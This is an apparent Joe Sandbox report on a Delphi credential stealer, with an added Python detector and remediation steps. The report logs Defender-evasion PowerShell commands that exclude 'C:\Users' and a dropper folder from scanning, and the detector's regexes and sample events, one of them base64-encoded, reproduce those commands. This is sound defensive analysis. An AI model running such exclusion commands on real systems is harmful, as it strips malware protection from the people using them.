                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:2
                                                                                                                Start time:05:59:24
                                                                                                                Start date:30/12/2024
                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\FkSpRTrp'
                                                                                                                Imagebase:0x510000
                                                                                                                File size:433'152 bytes
                                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:3
                                                                                                                Start time:05:59:24
                                                                                                                Start date:30/12/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:5
                                                                                                                Start time:05:59:27
                                                                                                                Start date:30/12/2024
                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users'
                                                                                                                Imagebase:0x510000
                                                                                                                File size:433'152 bytes
                                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:6
                                                                                                                Start time:05:59:27
                                                                                                                Start date:30/12/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:7
                                                                                                                Start time:05:59:37
                                                                                                                Start date:30/12/2024
                                                                                                                Path:C:\FkSpRTrp\jyidkjkfhjawd.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\FkSpRTrp\jyidkjkfhjawd.exe"
                                                                                                                Imagebase:0xab0000
                                                                                                                File size:1'282'048 bytes
                                                                                                                MD5 hash:1B40450E11F71DA7D6F3D9C025C078E0
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:Borland Delphi
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000003.1860268247.0000000001436000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000003.1861189025.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000003.1874194613.0000000001434000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000003.1861666105.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000003.1874370927.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000003.1860623456.0000000001436000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                Antivirus matches:
                                                                                                                • Detection: 100%, Avira
                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                Reputation:low
                                                                                                                Has exited:true
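The process list above shows the two actions a responder most needs to catch: Target ID 5 runs `Add-MpPreference -ExclusionPath 'C:\Users'`, which removes every user profile from Defender scanning before the payload is dropped, and Target ID 7 then executes the dropped Delphi stealer from `C:\FkSpRTrp\jyidkjkfhjawd.exe` (MD5 1B40450E11F71DA7D6F3D9C025C078E0). The following detection logic is an added example written for this page, not part of the Joe Sandbox report or of any vendor tooling. It assumes a simplified process-creation record (image path, command line, optional file hash) such as one would build from Sysmon event 1 or Security event 4688; the `ProcessEvent` class, the regular expressions and the sample events are mine and the sample events are constructed, although the command lines and hash are copied from this report. It also handles the `-EncodedCommand` variant that the report's Sigma hit ("Powershell Base64 Encoded MpPreference Cmdlet") refers to, by decoding the UTF-16LE base64 payload before matching.

```python
import base64
import re
from dataclasses import dataclass

# Indicators copied from this report's process list (Target ID 7).
DROPPED_FILE_MD5 = "1b40450e11f71da7d6f3d9c025c078e0"
DROPPED_FILE_PATH = r"C:\FkSpRTrp\jyidkjkfhjawd.exe"

# Assumed patterns (mine, not from the report): a Defender preference cmdlet
# combined with any of the three exclusion parameters.
MPPREF_RE = re.compile(r"(?:Add|Set)-MpPreference\b", re.IGNORECASE)
EXCLUSION_RE = re.compile(r"-Exclusion(?:Path|Process|Extension)\b", re.IGNORECASE)
# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the usual ones.
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


@dataclass
class ProcessEvent:
    """Minimal process-creation record (assumed shape, not a Sysmon/EVTX parser)."""
    image: str
    command_line: str
    md5: str = ""


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(event):
    """Return the list of alert names raised by a single process-creation event."""
    alerts = []
    text = event.command_line
    decoded = decode_encoded_command(text)
    if decoded:
        # Match on both the raw and the decoded command line.
        text = text + " " + decoded
    if MPPREF_RE.search(text) and EXCLUSION_RE.search(text):
        alerts.append("defender_exclusion_added")
        if decoded:
            alerts.append("defender_exclusion_encoded")
    if event.md5.lower() == DROPPED_FILE_MD5 or event.image.lower() == DROPPED_FILE_PATH.lower():
        alerts.append("known_dropped_payload")
    return alerts


def scan(events):
    """Map event index -> alerts for every event that raised at least one alert."""
    hits = {}
    for i, event in enumerate(events):
        alerts = classify(event)
        if alerts:
            hits[i] = alerts
    return hits


def encode_command(powershell):
    """Build an -EncodedCommand argument; used here only to construct sample input."""
    return base64.b64encode(powershell.encode("utf-16-le")).decode("ascii")


# Constructed sample events: 0, 2 and 3 mirror Target IDs 5, 7 and 6 of this report;
# 1 is the encoded variant; 4 is a benign read-only query that must not alert.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
                 "\"powershell.exe\" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\\Users'"),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -NoProfile -EncodedCommand "
                 + encode_command("Add-MpPreference -ExclusionPath 'C:\\Users'")),
    ProcessEvent(r"C:\FkSpRTrp\jyidkjkfhjawd.exe", "\"C:\\FkSpRTrp\\jyidkjkfhjawd.exe\"",
                 md5="1B40450E11F71DA7D6F3D9C025C078E0"),
    ProcessEvent(r"C:\Windows\System32\conhost.exe",
                 r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -Command Get-MpPreference"),
]

if __name__ == "__main__":
    for index, alerts in scan(SAMPLE_EVENTS).items():
        print(index, SAMPLE_EVENTS[index].image, alerts)
```

On a host suspected of having run this sample, `Get-MpPreference | Select-Object -ExpandProperty ExclusionPath` shows whether the `C:\Users` exclusion is still present, and `Remove-MpPreference -ExclusionPath 'C:\Users'` reverts it; the change itself is also recorded in the Microsoft-Windows-Windows Defender/Operational log as event 5007, which is worth collecting independently of process-creation telemetry because the exclusion persists after the PowerShell process has exited.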


                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:17.5%
                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                  Signature Coverage:0%
                                                                                                                  Total number of Nodes:6
                                                                                                                  Total number of Limit Nodes:0
                                                                                                                  • Execution graph: be09b8 → be09dc → be04d4 → be0b80 (GetConsoleWindow) → be0c02 → be0a0b; be09dc also branches directly to be0a0b

                                                                                                                  Control-flow Graph

                                                                                                                  • Control-flow graph: function at be0f40, basic blocks be0f40-be18bc; calls be3261, be1fb0, be2a81, be3078
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1815859905.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_be0000_eXbhgU9.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: `lq
                                                                                                                  • API String ID: 0-2378346327
                                                                                                                  • Opcode ID: c17cde3164b84bccd320fc8bf4ac7b209f1700e731891a0b91125b66951fa167
                                                                                                                  • Instruction ID: a4036ca9919d824c2cb8cb391b565647c464bb19f5536c55eae61fe323456a2c
                                                                                                                  • Opcode Fuzzy Hash: c17cde3164b84bccd320fc8bf4ac7b209f1700e731891a0b91125b66951fa167
                                                                                                                  • Instruction Fuzzy Hash: 53529374A01229CFDB64DF69C980B99B7F5BF49300F1085E6D449AB365EB30AE85CF60

                                                                                                                  Control-flow Graph

                                                                                                                  • Control-flow graph: function at be0f30, basic blocks be0f30-be18bc; calls be3261, be1fb0, be2a81, be3078
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1815859905.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_be0000_eXbhgU9.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 7b27975699bc33bb12ac5b59753c0bcab7c8946d33ef94c9009b0f839bf97c55
                                                                                                                  • Instruction ID: 4cdf189fcc88b5d1af02304aa09e3a7d903404dd47f9ee1177bc2f3085a623b4
                                                                                                                  • Opcode Fuzzy Hash: 7b27975699bc33bb12ac5b59753c0bcab7c8946d33ef94c9009b0f839bf97c55
                                                                                                                  • Instruction Fuzzy Hash: 30D19274901219CFDB14CF59C984BD9FBF1BF49300F15C6A6D449AB265EB309A89CF60

                                                                                                                  Control-flow Graph

                                                                                                                  • Control-flow graph: function at be2a81, basic blocks be2a81-be2c19; calls be2584, be2594
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1815859905.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_be0000_eXbhgU9.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 8455a219c2e47e6c6a5f32362947f0f5b0019c89a9d2c9519d210fd375fcd851
                                                                                                                  • Instruction ID: 626f9e64b9fd9b9023c69420acf043e6e73c7552a658dca9a7e32b959db159bb
                                                                                                                  • Opcode Fuzzy Hash: 8455a219c2e47e6c6a5f32362947f0f5b0019c89a9d2c9519d210fd375fcd851
                                                                                                                  • Instruction Fuzzy Hash: 9951E470D01249DFCB18DFB9D590AADBBB6BF89300F20946AE415BB364DB359942CF04

                                                                                                                  Control-flow Graph

                                                                                                                  • Control-flow graph: function at be3078, basic blocks be3078-be3203; calls be2584, be2594
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1815859905.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_be0000_eXbhgU9.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 9feaabf5291c459f29f5f102372a23d6cd4156e6884f407104c34f8ec635116e
                                                                                                                  • Instruction ID: 1912fc90037cc770915792611a90c4e66beb0fe02642b10427b8c48bf0dbfde6
                                                                                                                  • Opcode Fuzzy Hash: 9feaabf5291c459f29f5f102372a23d6cd4156e6884f407104c34f8ec635116e
                                                                                                                  • Instruction Fuzzy Hash: 4451E474E01209DFCB18DFA9D594AADBBF2BF89300F209469E419B7354DB359942CF04

                                                                                                                  Control-flow Graph

                                                                                                                  • Control-flow graph: function at be04d4, basic blocks be04d4-be0c35; API call GetConsoleWindow
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1815859905.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_be0000_eXbhgU9.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ConsoleWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2863861424-0
                                                                                                                  • Opcode ID: b335d00e8bfa4a72ca3955d581fb211e580b7b1eb65a50f143d4ce7312e75bdc
                                                                                                                  • Instruction ID: 06751142a3bf25de108195ad8f5c3c78c80f390e5482d6da52aad208bd5f4be7
                                                                                                                  • Opcode Fuzzy Hash: b335d00e8bfa4a72ca3955d581fb211e580b7b1eb65a50f143d4ce7312e75bdc
                                                                                                                  • Instruction Fuzzy Hash: 4E21BBB5D102589FCB10DFA9D584A9EBBF4FB08324F20806AE804B7311D375A941CFA4

                                                                                                                  Control-flow Graph

                                                                                                                  • Control-flow graph: function at be0b7a, basic blocks be0b7a-be0c35; API call GetConsoleWindow
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1815859905.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_be0000_eXbhgU9.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ConsoleWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2863861424-0
                                                                                                                  • Opcode ID: d0b14cbef94bff920fae56a921c01ef44023298aa13038825f6c280f375e4abf
                                                                                                                  • Instruction ID: 9fa19cf0227919b71f746f1465dc9b9777324356a18766d35c328e2018ec8671
                                                                                                                  • Opcode Fuzzy Hash: d0b14cbef94bff920fae56a921c01ef44023298aa13038825f6c280f375e4abf
                                                                                                                  • Instruction Fuzzy Hash: 7021BCB9D002589FCB10CFA9D584ADEBBF0FB58314F20805AE809B7351C375A945CFA4

                                                                                                                  Control-flow Graph

                                                                                                                  • Control-flow graph: function at b8d006, basic blocks b8d006-b8d0d1 (contains a tight self-loop at b8d047); no calls
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1815248454.0000000000B8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8D000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_b8d000_eXbhgU9.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: ff4010765d23f8654e872f44f5641f089c5f62c46d9c179712bfcd425b1dbb5d
                                                                                                                  • Instruction ID: 2726d716c7d2cf9a5bf539580dfc1db1cb4ba96d1b059acc7b0cefb563f357e7
                                                                                                                  • Opcode Fuzzy Hash: ff4010765d23f8654e872f44f5641f089c5f62c46d9c179712bfcd425b1dbb5d
                                                                                                                  • Instruction Fuzzy Hash: 94210F6240E3D08ED70787248CA46517FB89F53225F0E81DBD889CF1F7C1699849C762
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1815248454.0000000000B8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8D000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_b8d000_eXbhgU9.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 2d910f0db11efc426e5439ee606dd573fe29beba998dfc092f3066fd2b61a04b
                                                                                                                  • Instruction ID: 4727d1c109463803597a8eb514c37a60b4102363e87dca03819951dfac218161
                                                                                                                  • Opcode Fuzzy Hash: 2d910f0db11efc426e5439ee606dd573fe29beba998dfc092f3066fd2b61a04b
                                                                                                                  • Instruction Fuzzy Hash: DD213775500244DFCB05EF14D9C0F2BBFA5FB98314F20C5AAE8094B2A6C336D856CBA1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1815248454.0000000000B8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8D000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_b8d000_eXbhgU9.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                  • Instruction ID: 603603fb503a66e9f6e72dfe1ea496b16aef1ff8578ed1b68032ee835d20ddea
                                                                                                                  • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                  • Instruction Fuzzy Hash: B811D67A504280CFCB16DF10D5C4B16BFB1FB94314F24C5EAD8094B666C336D856CB91
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1815248454.0000000000B8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8D000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_b8d000_eXbhgU9.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: aa9ebbad0c59570b445948219440f097c628724198171ba38ac8b563306dcf61
                                                                                                                  • Instruction ID: da549c7a181e16f0237ff6c1fc7a92d1bfeda11f998789aa83e13b9006bf2188
                                                                                                                  • Opcode Fuzzy Hash: aa9ebbad0c59570b445948219440f097c628724198171ba38ac8b563306dcf61
                                                                                                                  • Instruction Fuzzy Hash: 6E01F7311083009AE720AA25DDD4767BFD8EF41320F18C5ABEC094A2E6C2799841C771

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage: 6.7%
                                                                                                                  Dynamic/Decrypted Code Coverage: 0%
                                                                                                                  Signature Coverage: 0%
                                                                                                                  Total number of Nodes: 3
                                                                                                                  Total number of Limit Nodes: 0

                                                                                                                  Control-flow Graph
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1702632552.0000000004440000.00000040.00000800.00020000.00000000.sdmp, Offset: 04440000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_4440000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: {Ygn^$Ygn^
                                                                                                                  • API String ID: 0-934482850
                                                                                                                  • Opcode ID: 7397e8b2d341df74f7a122eff9b805cbc508e0d6435a666ee02dcfb46463bf9b
                                                                                                                  • Instruction ID: 1d989b7f8186776a80a455d7bc283d7c95d2a39542fbbde793b590eecd1322b2
                                                                                                                  • Opcode Fuzzy Hash: 7397e8b2d341df74f7a122eff9b805cbc508e0d6435a666ee02dcfb46463bf9b
                                                                                                                  • Instruction Fuzzy Hash: 6F9194B1F006945BEF69EFB489005AEB7E2EFC4700B00896ED106AB754DF74AA058BD5

                                                                                                                  Control-flow Graph
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1707781552.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_6e30000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 4'kq$4'kq$4'kq$4'kq
                                                                                                                  • API String ID: 0-1293621312
                                                                                                                  • Opcode ID: 71e4cbc2606078c7163daef4f45e4266ea0bc05cb0148713489e755d2630dacd
                                                                                                                  • Instruction ID: 1ba7598b01f1c6bb47c88086912339d375d8b5a785ee9770a95e813ff6679e4b
                                                                                                                  • Opcode Fuzzy Hash: 71e4cbc2606078c7163daef4f45e4266ea0bc05cb0148713489e755d2630dacd
                                                                                                                  • Instruction Fuzzy Hash: DC127B31B04365CFC7658B688908AABBBE2AFD1315F2484BAD505CF391DB32DD45CBA1

                                                                                                                  Control-flow Graph
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1709969495.0000000008120000.00000040.00000800.00020000.00000000.sdmp, Offset: 08120000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_8120000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ThreadToken
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3254676861-0
                                                                                                                  • Opcode ID: 7a7b2c7a5d61ef25c028447400850e86dfa5102840453d832dc72f7d273d68a0
                                                                                                                  • Instruction ID: e892360e749961f874bcf39b38e7bdd4ba5f1f2fb2efe1a9be473767e4b58a95
                                                                                                                  • Opcode Fuzzy Hash: 7a7b2c7a5d61ef25c028447400850e86dfa5102840453d832dc72f7d273d68a0
                                                                                                                  • Instruction Fuzzy Hash: 2B1146B19002588FCB10DF9DC584ADEFFF4AF48320F248469D459A7260C774A944CFA1

                                                                                                                  Control-flow Graph
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1709969495.0000000008120000.00000040.00000800.00020000.00000000.sdmp, Offset: 08120000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_8120000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ThreadToken
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3254676861-0
                                                                                                                  • Opcode ID: 016b3c29ace599c4a8caab8b563313dc1094e167b9ecabd124e249e95554bc8d
                                                                                                                  • Instruction ID: 0f4902d02b70a5be3cb7b2e92df4271e45f3eb5a357a8537ea6b9c16fd2f9298
                                                                                                                  • Opcode Fuzzy Hash: 016b3c29ace599c4a8caab8b563313dc1094e167b9ecabd124e249e95554bc8d
                                                                                                                  • Instruction Fuzzy Hash: F11125B19002588FCB10DF9AC984B9EFBF8EF48324F24842AD459A7260C774A944CFA4

                                                                                                                  Control-flow Graph
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1702632552.0000000004440000.00000040.00000800.00020000.00000000.sdmp, Offset: 04440000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_4440000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: (oq
                                                                                                                  • API String ID: 0-3175707579
                                                                                                                  • Opcode ID: fccec812acec3b1062a87b3cb3e99b54aed5a51c561f62e0a0310155fef9915d
                                                                                                                  • Instruction ID: 88899bf01898dd26cde64aa0b868ef105ffff051df990e290933411ed98a2b80
                                                                                                                  • Opcode Fuzzy Hash: fccec812acec3b1062a87b3cb3e99b54aed5a51c561f62e0a0310155fef9915d
                                                                                                                  • Instruction Fuzzy Hash: C7415F74B052048FDB15DFA8C454AAEBBF2EF8D310F159499E406AB395DB31EC02CB64

                                                                                                                  Control-flow Graph
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1702632552.0000000004440000.00000040.00000800.00020000.00000000.sdmp, Offset: 04440000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_4440000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: piIk
                                                                                                                  • API String ID: 0-4138124211
                                                                                                                  • Opcode ID: 25804107af5b935c9d3218c3c83fa6cd22ba4247ff3a58a50cba8515d3afffd5
                                                                                                                  • Instruction ID: ff54726a1da293626b8760a725173962bc514849f47ad76825c6ec3d939069d7
                                                                                                                  • Opcode Fuzzy Hash: 25804107af5b935c9d3218c3c83fa6cd22ba4247ff3a58a50cba8515d3afffd5
                                                                                                                  • Instruction Fuzzy Hash: F531A070A00245DFCB21DF79D994A9EBBF2FF88300F148569D815AB394DB34AD45CBA0

                                                                                                                  Control-flow Graph
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1702632552.0000000004440000.00000040.00000800.00020000.00000000.sdmp, Offset: 04440000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_4440000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: piIk
                                                                                                                  • API String ID: 0-4138124211
                                                                                                                  • Opcode ID: 465748129c961fba9db2c3462e071b33b73cccc40c3f689ca65e912938ed015a
                                                                                                                  • Instruction ID: b20b4dcdcecf7c36fe499d0b794a067ad72c4653323a0d49989cf2fd51eccbb3
                                                                                                                  • Opcode Fuzzy Hash: 465748129c961fba9db2c3462e071b33b73cccc40c3f689ca65e912938ed015a
                                                                                                                  • Instruction Fuzzy Hash: AC317830A00205DFCB24DF69D994A9EBBF2FF88300F108569D41AA7794DB34AD49CBA0

                                                                                                                  Control-flow Graph
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1702632552.0000000004440000.00000040.00000800.00020000.00000000.sdmp, Offset: 04440000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_4440000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: (&kq
                                                                                                                  • API String ID: 0-3641282905
                                                                                                                  • Opcode ID: 3bead41bd7c5c951a6119db4ab0c4f2d1178dc9981f4c9076de67278b0070666
                                                                                                                  • Instruction ID: b89c63997813fb4ea7fe84ad0c5e125c05bac997395dfde0d791a5aecf60231e
                                                                                                                  • Opcode Fuzzy Hash: 3bead41bd7c5c951a6119db4ab0c4f2d1178dc9981f4c9076de67278b0070666
                                                                                                                  • Instruction Fuzzy Hash: 6521AE71A002588FDB24DFAED40469FBFF5EB88320F24846ED518A7350CB75A945CBE5

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 349 444d270-444d29c 351 444d29e 349->351 352 444d2a8-444d31b 349->352 351->352 362 444d347-444d34c 352->362 363 444d31d-444d32d 352->363 364 444d32f 363->364 365 444d339-444d33c 363->365 364->365 365->362
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1702632552.0000000004440000.00000040.00000800.00020000.00000000.sdmp, Offset: 04440000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_4440000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: </vl
                                                                                                                  • API String ID: 0-2513005275
                                                                                                                  • Opcode ID: 1ea3e7db718c426420d037b7daa12654c5e5ec0152deb936a49cfe69f9e77ed7
                                                                                                                  • Instruction ID: 1a929ee59af37f502ff717c4c69b2d1449e1089b983c2f786d6c7e00feb72205
                                                                                                                  • Opcode Fuzzy Hash: 1ea3e7db718c426420d037b7daa12654c5e5ec0152deb936a49cfe69f9e77ed7
                                                                                                                  • Instruction Fuzzy Hash: C721ACB07002409FDB10DB69D480E9ABBE6EF89354B0485AEE409CFB55DB34EC56CB90

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 366 444d280-444d29c 367 444d29e 366->367 368 444d2a8-444d31b 366->368 367->368 378 444d347-444d34c 368->378 379 444d31d-444d32d 368->379 380 444d32f 379->380 381 444d339-444d33c 379->381 380->381 381->378
                                                                                                                  Strings
